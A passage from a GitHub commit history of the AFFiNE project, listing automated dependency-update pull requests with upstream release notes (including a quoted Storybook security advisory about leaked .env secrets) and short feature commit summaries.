([@​jonniebigodes](https://redirect.github.com/jonniebigodes)) ##### Authors: 2 - [@​jonniebigodes](https://redirect.github.com/jonniebigodes) - Gert Hengeveld ([@​ghengeveld](https://redirect.github.com/ghengeveld)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
345f45d327 |
chore: bump up @capgo/inappbrowser version to v8 (#14346)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@capgo/inappbrowser](https://capgo.app/docs/plugins/inappbrowser/)
([source](https://redirect.github.com/Cap-go/capacitor-inappbrowser)) |
[`^7.1.0` →
`^8.0.0`](https://renovatebot.com/diffs/npm/@capgo%2finappbrowser/7.29.4/8.1.11)
|
|
|
---
### Release Notes
<details>
<summary>Cap-go/capacitor-inappbrowser
(@​capgo/inappbrowser)</summary>
###
[`v8.1.11`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.11)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.10...8.1.11)
#### 🆕 Changelog
#### Changed
- Added Capacitor version compatibility table to README documentation
clarifying which plugin versions work with which Capacitor versions and
their maintenance status
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.10...8.1.11>
###
[`v8.1.10`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.10)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.9...8.1.10)
#### 🆕 Changelog
#### Fixed
- Corrected `addEventListener` usage in `messageFromWebview` example
documentation
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.9...8.1.10>
###
[`v8.1.9`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.9)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.8...8.1.9)
#### 🆕 Changelog
#### Changed
- Locked capacitor-swift-pm dependency to version 8.0.0 for improved
stability
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.8...8.1.9>
###
[`v8.1.8`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.8)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.7...8.1.8)
#### 🆕 Changelog
#### Fixed
- Prevent race condition in `setHidden()` async path that could cause
visibility state inconsistencies
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.7...8.1.8>
###
[`v8.1.7`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.7)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.6...8.1.7)
#### 🆕 Changelog
#### Fixed
- Fixed show/hide functionality for Android that was not working
correctly
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.6...8.1.7>
###
[`v8.1.6`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.6)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.5...8.1.6)
#### 🆕 Changelog
#### Fixed
- Fixed `show()` method not properly displaying hidden WebView on iOS
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.5...8.1.6>
###
[`v8.1.5`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.5)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.4...8.1.5)
#### 🆕 Changelog
#### Added
- Exposed `mobileApp` interface on Android platform, providing access to
mobile app functionality and metadata
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.4...8.1.5>
###
[`v8.1.4`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.4)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.3...8.1.4)
#### 🆕 Changelog
#### Fixed
- Fixed safe bottom inset calculation for devices using gesture
navigation
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.3...8.1.4>
###
[`v8.1.3`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.3)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.2...8.1.3)
#### 🆕 Changelog
#### Added
- WebView visibility control from JavaScript via
`window.mobileApp.hide()` and `window.mobileApp.show()` methods
(requires `allowWebViewJsVisibilityControl: true` in CapacitorConfig)
- Native `hide()` and `show()` methods to the plugin API for
programmatic WebView visibility control
#### Fixed
- Configuration accessors for JavaScript visibility control
- Null guard checks in hide/show functionality to prevent crashes
- State management to properly restore hidden mode after snapshots
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.2...8.1.3>
###
[`v8.1.2`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.2)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.1...8.1.2)
#### 🆕 Changelog
#### Changed
- Updated Gradle to v8.14.4
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.1...8.1.2>
###
[`v8.1.1`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.1)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.1.0...8.1.1)
#### 🆕 Changelog
#### Changed
- Updated `capacitor-swift-pm` dependency from version 8.0.1 to a newer
version for improved Swift Package Manager integration
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.1.0...8.1.1>
###
[`v8.1.0`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.1.0)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.0.6...8.1.0)
#### 🆕 Changelog
#### Added
- Hidden webview mode allowing the browser to operate invisibly in the
background without displaying UI
- Support for hidden webview functionality on both iOS and Android
platforms
#### Changed
- Updated Capacitor Swift PM dependency to version 8.0.0
- Updated Vite to version 7.3.1 in example project
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.0.6...8.1.0>
###
[`v8.0.6`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.0.6)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.0.5...8.0.6)
#### 🆕 Changelog
#### Changed
- Updated dependency lock files to latest compatible versions
- Updated mistricky/ccc GitHub Action to v0.2.6
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.0.5...8.0.6>
###
[`v8.0.5`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.0.5)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.0.4...8.0.5)
#### 🆕 Changelog
#### Changed
- Updated lock files to maintain dependency integrity and improve
package resolution
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.0.4...8.0.5>
###
[`v8.0.4`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.0.4)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.0.3...8.0.4)
#### 🆕 Changelog
#### Fixed
- Updated `androidx.webkit:webkit` dependency to v1.15.0
- Updated `androidx.core:core-splashscreen` dependency to v1.2.0
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.0.3...8.0.4>
###
[`v8.0.3`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.0.3)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.0.2...8.0.3)
#### 🆕 Changelog
#### Added
- New `disableOverscroll` option for iOS to control bounce effect
behavior
#### Fixed
- Updated `androidx.window:window` dependency to version 1.5.1 for
improved Android window management
#### Changed
- Migrated build system to use Bun instead of npm for Android builds
- Updated `mistricky/ccc` action to version 0.2.5
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.0.2...8.0.3>
###
[`v8.0.2`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.0.2)
[Compare
Source](https://redirect.github.com/Cap-go/capacitor-inappbrowser/compare/8.0.1...8.0.2)
#### 🆕 Changelog
#### Changed
- Updated Capacitor Camera and Splash Screen dependencies to version
8.0.0 for improved compatibility
- Simplified safe area insets calculation in iOS WebView height
management for better code maintainability
- Removed redundant Android version check for mixed content mode in
WebView settings
- Improved variable naming throughout the codebase for better code
clarity and consistency
- Added homepage field to package metadata pointing to plugin
documentation
***
🔗 **Full Changelog**:
<https://github.com/Cap-go/capacitor-inappbrowser/compare/8.0.1...8.0.2>
###
[`v8.0.1`](https://redirect.github.com/Cap-go/capacitor-inappbrowser/releases/tag/8.0.1)
[Compare
Source](
|
||
|
DarkSky
|
f1a6e409cb |
feat(server): lightweight s3 client (#14348)
#### PR Dependency Tree * **PR #14348** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added a dedicated S3-compatible client package and expanded S3-compatible storage config (endpoint, region, forcePathStyle, requestTimeoutMs, minPartSize, presign options, sessionToken). * Document sync now broadcasts batched/compressed doc updates for more efficient real-time syncing. * **Tests** * New unit and benchmark tests for base64 utilities and S3 multipart listing; updated storage-related tests to match new formats. <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
888f1f39db | chore: bump deps (#14341) | ||
|
DarkSky
|
b49e48b467 | feat: add new tool | ||
|
renovate[bot]
|
69907083f7 |
chore: bump up opentelemetry (#14300)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/2.2.0/2.5.0) |  |  | | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.208.0` → `^0.211.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.208.0/0.211.0) |  |  | | [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.2.0/2.5.0) |  |  | | [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`0.38.0` → `0.38.2`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.38.0/0.38.2) |  |  | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.208.0` → `^0.211.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.208.0/0.211.0) |  |  | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.56.0` → `^0.58.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.56.0/0.58.0) |  |  | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.208.0` → `^0.211.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.208.0/0.211.0) |  |  | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.57.0` → `^0.59.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.57.0/0.59.0) |  |  | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.55.0` → `^0.57.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.55.0/0.57.0) |  |  | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.55.0` → `^0.57.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.55.1/0.57.0) |  |  | | [@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/2.2.0/2.5.0) |  |  | | [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.2.0/2.5.0) |  |  | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.208.0` → `^0.211.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.208.0/0.211.0) |  |  | | [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.2.0` → `2.5.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.2.0/2.5.0) |  |  | | [@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.38.0` → `1.39.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.38.0/1.39.0) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/core)</summary> ### [`v2.5.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#250) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v2.4.0...v2.5.0) ##### 🐛 Bug Fixes - refactor(resources): use runtime check for default service name [#​6257](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6257) [@​overbalance](https://redirect.github.com/overbalance) ##### 🏠 Internal - chore(context-async-hooks): Deprecate `AsyncHooksContextManager` [#​6298](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6298) [@​trentm](https://redirect.github.com/trentm) - chore: fix CODEOWNERS rule ordering [#​6297](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6297) [@​overbalance](https://redirect.github.com/overbalance) - fix(github): fix CODEOWNERS browser package paths [#​6303](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6303) [@​overbalance](https://redirect.github.com/overbalance) - fix(build): update [@​types/node](https://redirect.github.com/types/node) to 18.19.130, remove DOM types from base tsconfig [#​6280](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6280) [@​overbalance](https://redirect.github.com/overbalance) ### [`v2.4.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#240) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v2.3.0...v2.4.0) ##### 🐛 Bug Fixes - fix(sdk-metrics): improve PeriodicExportingMetricReader() constructor input validation [#​6286](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6286) [@​cjihrig](https://redirect.github.com/cjihrig) - fix(core): Avoid using DOM types for otperformance export [#​6278](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6278) [@​samchungy](https://redirect.github.com/samchungy) ##### 🏠 Internal - chore(browser): fix CODEOWNERS paths for browser-related packages - refactor(sdk-metrics): remove Promise.allSettled() ponyfill [#​6277](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6277) [@​cjihrig](https://redirect.github.com/cjihrig) ### [`v2.3.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#230) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v2.2.0...v2.3.0) ##### 🚀 Features - feat(sdk-trace-base): implement on ending in span processor [#​6024](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6024) [@​majanjua-amzn](https://redirect.github.com/majanjua-amzn) - note: this feature is experimental and subject to change ##### 🐛 Bug Fixes - fix(sdk-metrics): remove setImmediate usage in ConsoleMetricExporter [#​6199](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6199) [@​overbalance](https://redirect.github.com/overbalance) ##### 🏠 Internal - refactor(bundler-tests): split webpack tests into webpack-4 and webpack-5 [#​6098](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6098) [@​overbalance](https://redirect.github.com/overbalance) - refactor(sdk-metrics): remove isNotNullish() utility function [#​6151](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6151) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(sdk-metrics): remove FlatMap() utility function [#​6154](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6154) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(sdk-metrics): simplify AllowList and DenyList processors [#​6159](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6159) [@​cjihrig](https://redirect.github.com/cjihrig) - chore: disallow constructor parameter property syntax [#​6187](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6187) [@​legendecas](https://redirect.github.com/legendecas) - refactor(sdk-metrics): use test() instead of match() in isValidName() [#​6205](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6205) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(core): remove TimeOriginLegacy Safari <15 fallback [#​6235](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6235) [@​overbalance](https://redirect.github.com/overbalance) - chore: remove backcompat workspace [#​6238](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6238) [@​overbalance](https://redirect.github.com/overbalance) - refactor(core,resources): consolidate platform-specific code [#​6208](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6208) [@​overbalance](https://redirect.github.com/overbalance) - test(api): remove unnecessary conditional [#​6241](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6241) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(api): remove several reverse() calls [#​6252](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6252) [@​cjihrig](https://redirect.github.com/cjihrig) - refactor(api): remove unnecessary map() call [#​6251](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6251) [@​cjihrig](https://redirect.github.com/cjihrig) - chore: add zed to gitignore [#​6258](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6258) [@​overbalance](https://redirect.github.com/overbalance) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/host-metrics)</summary> ### [`v0.38.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0382-2026-01-21) [Compare Source]( |
||
|
DarkSky
|
09cc2dceda |
feat: cleanup chat panel (#14259)
#### PR Dependency Tree * **PR #14258** * **PR #14259** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Split AI initialization into separate editor, app, and shared registries; removed legacy chat-panel and replaced it with a component-based editor chat, updating wiring and public exports. * Propagated server/subscription/model services into chat/playground components and improved session lifecycle and UI composition. * **Tests** * Added tests for AI effect registration and chat session resolution; extended DOM/test utilities and assertions. * **Chores** * Added happy-dom for runtime and test environments. <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
924d58603f | chore: improve event flow (#14266) | ||
|
DarkSky
|
27a58e764c | chore: bump version & deps | ||
|
DarkSky
|
279b7bb64f |
feat(core): integrate google calendar sync (#14248)
fix #14170 fix #13893 fix #13673 fix #13543 fix #13308 fix #7607 #### PR Dependency Tree * **PR #14247** * **PR #14248** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Integrations panel in Account Settings to link/unlink calendar providers. * Collapsible settings wrapper for improved layout. * **Improvements** * Calendar system reworked: per-account calendar groups, simplified toggles with explicit Save, richer event display (multi-dot date indicators), improved event time/title handling across journal views. * **Localization** * Added calendar keys: save-error, no-journal, no-calendar; removed legacy duplicate-error keys. <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
ca2462f987 |
feat(native): sync yocto codes (#14243)
#### PR Dependency Tree * **PR #14243** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Batch management API for coordinated document mutations and change tracking. * New document accessors (IDs, state snapshots, change/delete set queries) and subscriber count. * **Chores** * Upgraded Rust edition across packages to 2024. * Repository-wide formatting, stylistic cleanups and test adjustments. * **Breaking Changes** * Removed the Node native bindings package and its JS/TS declarations and tests (no longer published/available). <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
e4dc82ee35 |
chore: bump deps (#14227)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Chores**
* Updated backend service dependencies to the latest stable versions for
improved performance and security.
* Upgraded UI component library dependencies to the latest minor
releases.
* **Improvements**
* Enhanced web search functionality for better search results on
standard AI models.
<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
renovate[bot]
|
aa6f26b1a5 |
chore: bump up opentelemetry (#14208)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.56.0` → `^0.57.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.56.0/0.57.0) |  |  | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`0.55.0` → `0.55.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.55.0/0.55.1) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-ioredis)</summary> ### [`v0.57.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0570-2025-12-17) [Compare Source]( |
||
|
Cats Juice
|
cf98afb32e |
chore: bump theme@1.1.23 (#14222)
close #13952 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Upgraded the shared theme library from v1.1.16 to v1.1.23 across the project (core components, UI widgets, content blocks, and frontend apps), delivering the latest styling and design refinements platform-wide. <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: L-Sun <zover.v@gmail.com> |
||
|
DarkSky
|
fe5d6c0c0f |
feat(editor): support frontmatter & colored text parsing (#14205)
fix #13847 |
||
|
Yiding Jia
|
510933becf |
chore(server): bump ioredis to 5.8.2 for ipv6 support (#14204)
Bump ioredis to 5.8.2 for ipv6 support. Prior to 5.8.2 ioredis required passing `family: 0` or `family: 6` when constructing a client in order to connect to redis over ipv6. This was fixed in 5.8.2. fix #14197 |
||
|
DarkSky
|
0b0ae5ea0a | feat: add queue management for admin panel | ||
|
DarkSky
|
4f1d57ade5 |
feat: integrate typst preview & fix mermaid style (#14168)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Typst code block preview with interactive rendering controls (zoom,
pan, reset) and user-friendly error messages
* **Style**
* Centered Mermaid diagram rendering for improved layout
* **Tests**
* Added end-to-end preview validation tests for Typst and Mermaid
* **Chores**
* Added WebAssembly type declarations and updated frontend packages;
removed a build debug configuration entry
<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
DarkSky
|
6514614df8 | feat: bump electron (#14158) | ||
|
DarkSky
|
4eed92cebf | feat: improve electron sandbox (#14156) | ||
|
DarkSky
|
ca386283c5 | feat: bump electron (#14151) | ||
|
renovate[bot]
|
efbdee5508 |
chore: bump up storybook version to v10.1.10 [SECURITY] (#14131)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [storybook](https://storybook.js.org) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/core)) | [`10.1.5` -> `10.1.10`](https://renovatebot.com/diffs/npm/storybook/10.1.5/10.1.10) |  |  | ### GitHub Vulnerability Alerts #### [CVE-2025-68429](https://redirect.github.com/storybookjs/storybook/security/advisories/GHSA-8452-54wp-rmv6) On December 11th, the Storybook team received a responsible disclosure alerting them to a potential vulnerability in certain built and published Storybooks. The vulnerability is a bug in how Storybook handles environment variables defined in a `.env` file, which could, in specific circumstances, lead to those variables being unexpectedly bundled into the artifacts created by the `storybook build` command. When a built Storybook is published to the web, the bundle’s source is viewable, thus potentially exposing those variables to anyone with access. If those variables contained secrets, they should be considered compromised. ## Who is impacted? For a project to be vulnerable to this issue, it must: - Build the Storybook (i.e. run `storybook build` directly or indirectly) in a directory that contains a `.env` file (including variants like `.env.local`) - The `.env` file contains sensitive secrets - Use Storybook version `7.0.0` or above - Publish the built Storybook to the web Storybooks built without a `.env` file at build time are not affected, including common CI-based builds where secrets are provided via platform environment variables rather than `.env` files. Users' Storybook runtime environments (i.e. `storybook dev`) are not affected. Deployed applications that share a repo with a project's Storybook are not affected. Storybook 6 and below are not affected. ## Recommended actions First, Storybook recommends that everyone audit for any sensitive secrets provided via `.env` files and rotate those keys. Second, Storybook has released patched versions of all affected major Storybook versions that no longer have this vulnerability. Projects should upgrade their Storybook—on both local machines and CI environments—to one of these versions **before publishing again**. - `10.1.10+` - `9.1.17+` - `8.6.15+` - `7.6.21+` Finally, some projects may have been relying on the undocumented behavior at the heart of this issue and will need to change how they reference environment variables after this update. If a project can no longer read necessary environmental variable values, it can either prefix the variables with `STORYBOOK_` or use the [`env` property in Storybook’s configuration](https://storybook.js.org/docs/configure/environment-variables#using-storybook-configuration) to manually specify values. In either case, **do not** include sensitive secrets as they *will* be included in the built bundle. ## Further information Details of the vulnerability can be found on the [Storybook announcement](https://storybook.js.org/blog/security-advisory). --- ### Release Notes <details> 